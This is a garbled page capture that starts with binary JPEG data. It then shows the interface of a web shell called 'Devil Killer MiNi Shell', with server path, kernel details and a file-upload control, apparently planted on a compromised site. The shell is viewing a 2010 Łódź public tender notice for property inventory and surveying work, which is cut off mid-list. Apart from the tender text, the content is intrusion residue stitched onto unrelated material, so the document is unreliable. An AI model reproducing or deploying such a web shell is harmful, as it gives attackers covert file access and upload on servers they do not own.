JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101123/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101123/380218-N-2010.html

<p class="kh_header"><b>Łódź: Sukcesywne wykonywanie dokumentacji inwentaryzacyjnych dla mienia Skarbu Państwa podlegającego komunalizacji na terenie gminy Miasta Łódź (takich jak: karty inwentaryzacyjne, arkusze spisowe, dokumentacja geodezyjno-prawna do celów uregulowania stanów prawnych nieruchomości i dróg publicznych).</b><br>
<b>Numer ogłoszenia: 380218 - 2010; data zamieszczenia: 23.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Łódź, Wydział Zamówień Publicznych Urzędu Miasta Łodzi - Oddział ds. Usług , ul. ks. I.J. Skorupki 21, 90-532 Łódź, woj. łódzkie, tel. 42 638 48 88, faks 42 638 48 77.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://przetargi.bip.uml.lodz.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywne wykonywanie dokumentacji inwentaryzacyjnych dla mienia Skarbu Państwa podlegającego komunalizacji na terenie gminy Miasta Łódź (takich jak: karty inwentaryzacyjne, arkusze spisowe, dokumentacja geodezyjno-prawna do celów uregulowania stanów prawnych nieruchomości i dróg publicznych)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywne wykonywanie dokumentacji inwentaryzacyjnych dla mienia Skarbu Państwa podlegającego komunalizacji na terenie gminy Miasto Łódź. (takich jak: karty inwentaryzacyjne, arkusze spisowe, dokumentacja geodezyjno-prawna do celów uregulowania stanów prawnych nieruchomości i dróg publicznych).

Ilość nieruchomości objętych postępowaniem komunalizacyjnym, ustalono szacunkowo w oparciu o dane operatu ewidencji gruntów i oszacowano na poziomie:
 -	karty inwentaryzacyjne przewidywana ilość do - 500 szt.
-	mapy do celów prawnych za każdą działkę w wykazie powierzchni do - 300 opracowań.
Sposób dokonywania inwentaryzacji mienia komunalnego określa Uchwała Nr 104 Rady Ministrów z dnia 9 lipca 1990 r. w sprawie sposobu dokonywania inwentaryzacji mienia komunalnego (M.P. Nr 30, poz.235 z późniejszymi zmianami) oraz wytyczne do sporządzania dokumentacji inwentaryzacyjnej mienia podlegającego komunalizacji.

WYTYCZNE DO SPORZĄDZENIA DOKUMENTACJI INWENTARYZACYJNEJ MIENIA  PODLEGAJĄCEGO KOMUNALIZACJI
TECZKA  INWENTARYZACYJNA
Karta  nieruchomości  
-	informacje należy wpisać czytelnie wg druku, nie używając skrótów.
-	w kolumnach 2, 10, 11 wykazać sumę (w kolumnach 10 i 11 należy podać wartości wg cen na dzień 30.06.1990 r).
-	jeżeli dokumentacja obejmuje drogi znajdujące się w wykazie dróg wojewódzkich i krajowych lub nieruchomości inwentaryzowane na podstawie przepisów ustawy z dnia 24.11.1995 r. o zmianie zakresu działania niektórych miast oraz o miejskich strefach usług publicznych, należy podać wartości wg cen na dzień 31.12.1995 r.
-	jeżeli dokumentacja obejmuje nieruchomości rolne inwentaryzowane na podstawie ustawy z dnia 21 stycznia 2000 r. o zmianie niektórych ustaw związanych z funkcjonowaniem administracji publicznej, należy podać wartość wg cen na dzień 30.06.2000 r. 
-	kolumny 3, 4, 5, 6, 7, 8, 11 wypełnić w oparciu o dane uzyskane w jednostkach posiadających nieruchomość w zarządzie lub we władaniu tj. ZGM -u, Wydziału Geodezji itp.
-	w kolumnie 9 wpisać władającego wg danych operatu ewidencji gruntów, podając nazwę władającego - użytkownika na dzień komunalizacji oraz obecnego. 
-	jeżeli w operacie ewidencji gruntów Skarb Państwa ujawniony jest jako właściciel, bez określenia władającego, w karcie inwentaryzacyjnej należy wpisać: Urząd Dzielnicowy Łódź - Śródmieście Wydział Geodezji i Gospodarki Gruntami wspólny dla wszystkich dzielnic m. Łodzi, bez potrzeby dokonywania zmiany w operacie ewidencji. 
-	jeżeli w operacie ewidencji gruntów jako władający ujawnione jest Leśnictwo Miejskie Łódź, w karcie inwentaryzacyjnej należy wpisać - na dzień 27.05.1990 r. Łódzkie Przedsiębiorstwo Ogrodnicze w Łodzi, obecnie Leśnictwo Miejskie Łódź.
-	w kolumnie 12 podać numery inwentarzowe budynków, w przypadku inwentaryzacji wg działek hipotecznych podać: numer ewidencyjny mapy prawnej oraz numer obrębu dla wyszczególnionych w karcie działek, zgodny z obowiązującym podziałem obrębowym m. Łodzi na dzień wykonania mapy. 
-	numer ewidencyjny mapy prawnej oraz osobę prawną lub fizyczną wymienioną w kol. 9 należy wpisać w karcie inwentaryzacyjnej na poziomie numeru działki, której dane oznaczenia dotyczą.
-	opracowując dokumentację inwentaryzacyjną terenu przedsiębiorstw państwowych, należy ustalić czy dane przedsiębiorstwo posiada decyzję o zarządzie na dzień 27.05.1990 r. (nie decyzję o opłatach za zarząd lub użytkowanie)
-	w przypadku posiadania przez przedsiębiorstwo decyzji o zarządzie, czy potwierdzenia zarządu w formie aktu kupna sprzedaży, należy przerwać prace opracowując kartę tzw. przerwaną a kopię decyzji, aktu załączyć do karty. 
-	w przypadku braku decyzji o zarządzie należy opracować pełną dokumentację. 
-	na terenach zabudowanych, dzierżawionych lub będących we władaniu przedsiębiorstw państwowych podlegających komunalizacji, wpisać uwagę w kol.12 o treści: ( zakłada się, że budynki wzniesione są ze środków własnych (wg charakteru władania na dzień 27.05.1990 r.)). 
-	przy opracowaniu karty należy ustalić numery działek oraz ich powierzchnię, które stanowiły nieruchomości na dzień komunalizacji oraz obecne jej oznaczenie. Ustalenia dokonać np.: w oparciu o dane operatu ewidencji gruntów, decyzji uwłaszczeniowej czy wg mapy prawnej. 
-	sporządzić spis zawartości karty inwentaryzacyjnej (według wzoru pok. 384A) dla dokumentów pozostających w Oddziale Inwentaryzacji tj. 4-egz. karty, wypis, badanie księgi itd. 
Badanie księgi wieczystej
	badaniem objąć wszystkie działy księgi wieczystej, zwracając szczególną uwagę na datę jej urządzenia, oznaczenie i powierzchnie działek, placów na dzień komunalizacji oraz daty kolejnych wpisów. Opisać załączone wnioski o dokonanie zmian w księdze wieczystej z podaniem również daty ich złożenia.
	w przypadku stwierdzenia, iż wniosek taki został złożony, należy przed wykonaniem dokumentacji zawiadomić o tym Oddział Inwentaryzacji podając numer wniosku, datę i wnioskodawcę. 
	przy wieczystym użytkowaniu podać datę rozpoczęcia i zakończenia okresu użytkowania,
a dla wieczystych użytkowników ujawnionych po 27.05.1990 roku, należy ustalić użytkownika nieruchomości na ww. dzień. 
	w badaniu działu II należy podać oznaczenie dokumentów, na mocy których Skarb Państwa stał się właścicielem oraz kto ten dokument wydał i czego on dotyczy (zasiedzenie, przedawnienie, przepadek mienia, wywłaszczenie, reforma rolna itp.).
	dla orzeczeń Sądu dotyczących zasiedzenia wydanych po 27.05.1990 roku wpisać datę, z jaką Skarb Państwa stał się właścicielem.
	jeżeli brak wpisów w dziale III i IV zaznaczyć, że (brak wpisów ).
	w przypadku przeniesienia (verte) wpisów ujawnionych w księdze wieczystej na drugą stronę druku badania hipotecznego, dokonane wpisy należy podpisać, wpisać datę i przystawić pieczątkę z numerem uprawnień wykonawcy . 
	jeżeli w trakcie badania księgi wieczystej stwierdzono niezgodności lub błędne wpisy, przygotować komplet dokumentów i przekazać do Oddziału Regulowania Stanów Prawnych Nieruchomości, celem dokonania sprostowania wpisów.
	badanie hipoteczne księgi wieczystej wykorzystane do opracowania karty inwentaryzacyjnej musi być wykonane w terminie nie późniejszym niż 60 dni przed datą przekazania karty inwentaryzacyjnej do Oddziału Inwentaryzacji.
	przy wykonywaniu badań hipotecznych szczególną uwagę należy zwrócić na tzw. własność czasową - gdyż nieruchomość ta podlega komunalizacji tak jak nieruchomość będąca w wieczystym użytkowaniu. 
Dodatkowo należy wykonać badania hipoteczne ksiąg wieczystych dla odłączonych lokali w budynkach ZGM - zamieszczając następujące dane:
	nazwisko i imię właściciela lokalu oraz jego adres zamieszkania
	numer lokalu odłączonego
	powierzchnię lokalu
	udział w wieczystym użytkowaniu gruntu 
	Kopia z mapy ewidencji gruntów powinna zawierać:
	skalę mapy, kierunek północy
	aktualny stan naniesień
	opis nieruchomości z określeniem położenia
	oznaczenie granic działki ewidencyjnej kolorem żółtym, działki hipotecznej niebieskim
	podpis i pieczątka wykonawcy z numerem uprawnień
	datę wykonania
	nr karty inwentaryzacyjnej
	nr inwentarzowe budynków będących w administracji Z G M - u
	Kopia mapy do celów prawnych - załączana w przypadku sporządzenia karty inwentaryzacyjnej wg danych ujawnionych w księgach wieczystych winna zawierać:
	nr ewidencyjny mapy
	skalę mapy, kierunek północy, opis nieruchomości zgodny z księgą wieczystą
	oznaczenie granic hipotecznych działek podlegających inwentaryzacji - kolorem niebieskim, działek wyłączonych z komunalizacji - kolorem czerwonym 
	zestawienie powierzchni działek hipotecznych lub kopię wykazu powierzchni, oraz numer obrębu w przypadku wykorzystywania mapy opracowanej w starym podziale obrębowym. 
	datę, podpis i pieczątkę wykonawcy z numerem uprawnień.
	Wniosek - o dokonanie zmian w dziale I księgi wieczystej zarejestrowany w Sądzie Rejonowym dla Łodzi - Śródmieścia w Łodzi XVI Wydział Ksiąg Wieczystych, należy załączyć do karty inwentaryzacyjnej w przypadku zaistnienia takiej konieczności. W przypadku zmian dotyczących działu II księgi wieczystej, sprostowania dużych różnic powierzchni, czy dokonanie odłączenia lub przyłączenia działek, kartę można wykonać dopiero po realizacji wniosku przez ww. sąd.
	Wykonywanie kart inwentaryzacyjnych wg działek hipotecznych -
	 dopuszcza się gdy:
	nieruchomości znajdują się w wieczystym użytkowaniu Spółdzielni Mieszkaniowych.
	suma powierzchni nieruchomości znajdujących się we władaniu lub użytkowaniu np.:
ZGM- u, Wydziału Geodezji, Spółdzielni Pracy itp. oraz o nieuregulowanym stanie prawnym, stanowi powierzchnię działki ewidencyjnej, co należy przedstawić na szkicu sporządzonymna kopii mapy ewidencji gruntów, uwzględniając numery kart inwentaryzacyjnych, numery ksiąg wieczystych, granice hipoteczne, numery działek i ich powierzchnie (wzór w pokoju 384 A).
	W przypadku ujawnienia w księdze wieczystej wpisów dotyczących części ulicy, należy w karcie inwentaryzacyjnej wykazać działkę pod ulicą jako działkę hipoteczną, jeżeli nieruchomość zlecona stanowi w całości teren znajdujący się pod ulicą, należy rozważyć ewentualne dokonanie zmiany w operacie ewidencji gruntów i sporządzić kartę inwentaryzacyjną.
	UWAGA:
	Granice działek ewidencyjnych lub hipotecznych wchodzących w skład nieruchomości, dla której sporządzana jest karta inwentaryzacyjna oraz przy wykorzystaniu istniejących map prawnych do sporządzenia wniosków do działu pierwszego księgi wieczystej, należy sprawdzić poprzez skartowanie współrzędnych punktów granicznych na kopii mapy zasadniczej w skali 1:500 oraz kontrolnie obliczyć powierzchnie działek, a dokumenty powstałe z przeprowadzonej kontroli załączyć do dokumentacji inwentaryzacyjnej. 
	Kartowanie współrzędnych punktów granicznych na mapie zasadniczej i kontrolne obliczenie powierzchni nieruchomości (działki) nie dotyczy obrębów odnowionych, zatwierdzonych decyzją Prezydenta m. Łodzi oraz nieruchomości, dla których opracowano wyrysy lub mapy sytuacyjne do celów prawnych po dniu 1.01.2002 r. 
	W przypadku stwierdzenia niezgodności powiadomić właściwy organ, który podejmie określone w trybie obowiązujących przepisów decyzje o sposobie usunięcia rozbieżności. Dane dotyczące nieruchomości, ujawnione w operacie ewidencji gruntów, przyjęte do opracowania karty inwentaryzacyjnej, muszą być zgodne z zapisami ksiąg wieczystych, z wyjątkiem dokumentacji opracowanej wg działek hipotecznych, w której dane wykazane w karcie winny być zgodne z wykorzystaną mapą prawną i zapisami w księgach wieczystych.
	Kartę inwentaryzacyjną należy sporządzić w 4-egz., a pozostałe dokumenty załączone do teczki inwentaryzacyjnej w dwóch (mapa wywiadu oraz obliczenia kontrolne powierzchni działek w 1-egz.), dopuszcza się kserokopie oryginałów.
	Granice działek objętych inwentaryzacją oznaczyć odpowiednim kolorem na obu kopiach mapy ewidencji gruntów i map prawnych. Dodatkowe oznaczenie działek hipotecznych w karcie inwentaryzacyjnej wprowadzić tylko na czwartym egzemplarzu.
	W przypadku występowania w księdze wieczystej działek o różnym okresie wieczystego użytkowania, których suma powierzchni stanowi działkę ewidencyjną nie wolno wnioskować o dokonanie zmiany w dziale I KW przez ujawnienie działki ewidencyjnej.
Kartę inwentaryzacyjną należy sporządzić wg działek hipotecznych.
W przypadku ujawnienia w księdze wieczystej osoby fizycznej lub nieruchomości niepodlegającej komunalizacji, kiedy w ewidencji gruntów ujawniony jest Skarb Państwa - wykonać tzw. kartę przerwaną, w której należy podać ostatniego właściciela wg księgi wieczystej na dzień 27.05.1990 roku oraz aktualny wpis w KW na dzień wykonania badania.
Ponadto należy:
	załączyć badanie księgi wieczystej wszystkich czterech działów (obciążenia, wszczęcia postępowania wywłaszczeniowego - zakończenie, akt notarialny, decyzje itp.)
	załączyć wypis z ewidencji gruntów i kopię mapy ewidencyjnej. 
	dokumenty skompletować w teczkach, oddzielnie dla każdej nieruchomości i sporządzić dla nich odrębny arkusz spisowy.
Karty inwentaryzacyjne tzw. przerwane sporządza się tylko dla nieruchomości zleconych.
	Jeżeli w dziale drugim księgi wieczystej brak jest wpisów dokonanych po 1945 roku, dalszy tok postępowania należy uzgodnić z Oddziałem Regulowania Stanów Prawnych Nieruchomości Wydziału Geodezji Katastru i Inwentaryzacji UMŁ. 

 OPIS TECZKI INWENTARYZACYJNEJ
Teczkę inwentaryzacyjną opisać pismem technicznym o grubości 0.7 mm, pisząc w lewym górnym rogu teczki nr nr NKN, arkusza spisowego i położenie nieruchomości. 
Pod numerem NKN należy wpisać nr obrębu (wzór w pokoju 384 A).
Oznaczyć na teczce ołówkiem numery NKN - ów ( wypadających-zleconych), nadanych dla działek ewidencyjnych, które zostały objęte jedną księgą wieczystą.
W przypadku zmiany numeru działki w trakcie prac inwentaryzacyjnych wpisać (ołówkiem), jaka działka została zlecona.
 Spis inwentaryzacyjny nieruchomości należy wykonać w 2-egz.
	Dane dotyczące poszczególnych nieruchomości należy podać zgodnie z obowiązującym wzorem druku. W przypadku występowania dodatkowych oznaczeń dla działek hipotecznych należy je umieścić w drugim egzemplarzu.

SPORZĄDZENIE DOKUMENTACJI GEODEZYJNEJ 
	Mapy sytuacyjne do celów prawnych, opracowanie dokumentacji technicznej do wyrysu z mapy ewidencji gruntów można sporządzić po uzgodnieniu z  Oddziałem Regulowania Stanów Prawnych Nieruchomości  i Oddziałem Inwentaryzacji WGKiI, zgodnie z obowiązującymi przepisami i wg wytycznych Miejskiego Ośrodka Dokumentacji Geodezyjnej i Kartograficznej.
W przypadku stwierdzenia, że wpisy ujawnione w dziale pierwszym księgi wieczystej
są niezgodne z danymi ewidencji gruntów powiadomić właściwy organ, który podejmie określone w trybie obowiązujących przepisów decyzje o sposobie wyjaśnienia rozbieżności.
WYKORZYSTANIE ISTNIEJĄCEJ MAPY PRAWNEJ
W przypadku wykorzystania istniejącej mapy do celów prawnych, która jest załączona do księgi wieczystej, przy sporządzaniu dokumentacji inwentaryzacyjnej nie wymaga się poświadczenia tej mapy przez Miejski Ośrodek Dokumentacji Geodezyjnej i Kartograficznej.
Jeżeli mapa nie jest ujawniona w księdze wieczystej, a ma służyć do przygotowania wniosków dotyczących zmian w dziale I KW winna być poświadczona.
WYKAZ ZMIAN DANYCH EWIDENCYJNYCH
Wykaz zmian danych ewidencyjnych sporządzić zgodnie z obowiązującymi przepisami
po uzgodnieniu z Oddziałem Regulowania Stanów Prawnych Nieruchomości lub Inwentaryzacji.
Przyjęcie zmiany do operatu ewidencji gruntów, musi być poświadczone przez prowadzącego ewidencję. Należy podać numer mapy prawnej na podstawie, której został sporządzony oraz numer karty nieruchomości (NKN), dla której dokonano zmiany.
Potwierdzoną kopię wykazu zmian należy załączyć do teczki inwentaryzacyjnej jako ostatni dokument.
UZUPEŁNIENIE MAPY EWIDENCJI W ZAKRESIE BUDYNKÓW
Należy bezwzględnie wykonać wywiad w terenie. W przypadku stwierdzenia rozbieżności stanu faktycznego z danymi ujawnionymi na mapie ewidencji gruntów, kopię mapy załączoną do karty uzupełnić w oparciu o mapę zasadniczą m. Łodzi w zakresie dotyczącym mapy ewidencji gruntów, a do karty inwentaryzacyjnej załączyć potwierdzenie zgłoszenia zmiany do Miejskiego Ośrodka Dokumentacji Geodezyjnej i Kartograficznej w Łodzi. 
	UWAGA:
Po opracowaniu dokumentacji inwentaryzacyjnej należy dokładnie sczytać i porównać ze sobą oznaczenia księgi wieczystej, oznaczenia obrębów, numerów działek, powierzchni itp., umieszczonych na dokumentach tworzących ową dokumentację. W przypadku wykrycia rozbieżności należy je usunąć. Zasady sporządzania dokumentacji inwentaryzacyjnej mogą ulec zmianie w przypadku wprowadzenia nowych ustaleń przez Urząd Wojewódzki przy wydawaniu decyzji komunalizacyjnej.
Oferta musi obejmować ceny na następujące prace inwentaryzacyjne zamówienia wymienione w pkt 1.1 do 1. 7:
1.1. Wykonanie karty inwentaryzacyjnej (całość prac) 	zł,-
1.2.Opracowanie mapy do celów prawnych nieruchomości za każdą działkę w wykazie powierzchni: 
	a) za 4 pierwsze działki	 zł,-
	b) za następne 4 działki (od 5 do 8 działki) 	 zł,-
	c) za następne 4 działki ( od 9 do 12 działki) 	 zł,-
	d) za każdą następną działkę powyżej 12 	 zł,-
Ceny powyższe obejmują całość prac związanych z wykonaniem mapy do celów prawnych.
1.3. Wykonanie wyrysu z mapy ewidencji gruntów (całość prac) za każdą nieruchomość wykazaną na wyrysie (bez względu na ilość działek, które ją stanowią):
a)	za pierwszą nieruchomość 	 zł,-
b)	za każdą następną nieruchomość 	 zł,-
Uwaga: W przypadku wykonania wyrysu przez Miejski Ośrodek Dokumentacji Geodezyjnej i Kartograficznej w Łodzi, pkt 1. 3 nie obowiązuje. 

1.4.Wykorzystanie istniejących map prawnych ich aktualizacja, zaewidencjonowanie kopii tych map i wykonanie niezbędnych badań ksiąg wieczystych: 
	a) za pierwszą zleconą nieruchomość 	 zł,-
	b) za każdą następną zleconą nieruchomość 	 zł,-
c) za wykorzystanie kopii mapy bez konieczności zaewidencjonowania
(mapa załączona do KW - za egz. mapy bez względu na ilość
nieruchomości)	 zł,-
Uwaga:
Kartowanie współrzędnych punktów granicznych na mapie zasadniczej i kontrolne obliczenie powierzchni nieruchomości (działki) nie dotyczy obrębów odnowionych, zatwierdzonych decyzją Prezydenta Miasta Łodzi oraz nieruchomości, dla których opracowano wyrysy lub mapy sytuacyjne do celów prawnych - po dniu 1.01.2002 r. 
1.5. Wykonanie wykazu zmian danych ewidencyjnych w celu aktualizacji operatu  ewidencji gruntów (za wykaz - bez względu na ilość nieruchomości i działek objętych wykazem)	 zł,-
1.6. Za sporządzenie protokółu ustalenia i ogłoszenie stanu władania (ustalenie granic nieruchomości zleconej)  zł,-
1.7. Przygotowanie materiałów niezbędnych do podjęcia działań w celu uregulowania stanu prawnego, przerwanie prac inwentaryzacyjnych lub opracowanie dokumentacji technicznej w celu sporządzenia wyrysu przez MODG i K w Łodzi.
za zleconą nieruchomość 
	- całość prac (dotyczy pkt 1.7)	   zł,-.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.35.60.00-8, 71.35.40.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda od Wykonawcy wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać
w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać
w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać
w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca winien wykazać, że dysponuje lub będzie dysponował osobami, które będą uczestniczyć w realizacji zamówienia:
co najmniej czterema geodetami  posiadającymi uprawnienia zawodowe         do wykonywania samodzielnych funkcji technicznych w dziedzinie geodezji i kartografii - zgodnie z art. 43 pkt 2 ustawy z  dnia 17.05.1989 r. - Prawo geodezyjne i kartograficzne (Dz. U. z 2005 r. Nr 240, poz. 2027 ze zm.).
W przypadku Wykonawców zagranicznych zastosowanie ma art. 45 ustawy       z  dnia 17.05.1989 r. - Prawo geodezyjne i kartograficzne (Dz. U. z 2005 r. Nr 240, poz. 2027 ze zm.).
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana 
wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać
w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
